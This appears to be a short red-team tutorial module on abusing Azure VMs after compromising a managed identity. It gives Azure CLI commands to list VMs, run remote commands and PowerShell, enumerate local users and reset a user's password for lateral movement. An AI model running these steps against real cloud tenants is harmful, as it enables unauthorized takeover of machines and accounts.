Virtual Machine Abuse
This section is highly dependent on the Abusing Managed Identities module so i recommend checking that out first and then coming back to this ʕ •ᴥ•ʔ The setup is the same and the attack assumes you compromised a Linux-based VM and we can use it to execute commands on a Windows VM in the same resource group.
To start, we'll list all the VMs we have access to
~ ∮ az vm list -g DefaultResourceGroup-CUS --output table
In order to execute commands on one of them we can just execute the following
~ ∮ az vm run-command invoke -g DefaultResourceGroup-CUS -n <vm_name> --command-id IPConfig
One thing that comes really handy in lateral movement is being able to list users
~ ∮ az vm run-command invoke -g DefaultResourceGroup-CUS -n <vm_name> --command-id RunPowerShellScript --scripts Get-LocalUser
now that we know all the existing users on the VM we can reset one of their passwords and use the new one to log in
~ ∮ az vm user update -u <username> -p 'SomethingSecure123!' -n <vm_name> -g DefaultResourceGroup-CUS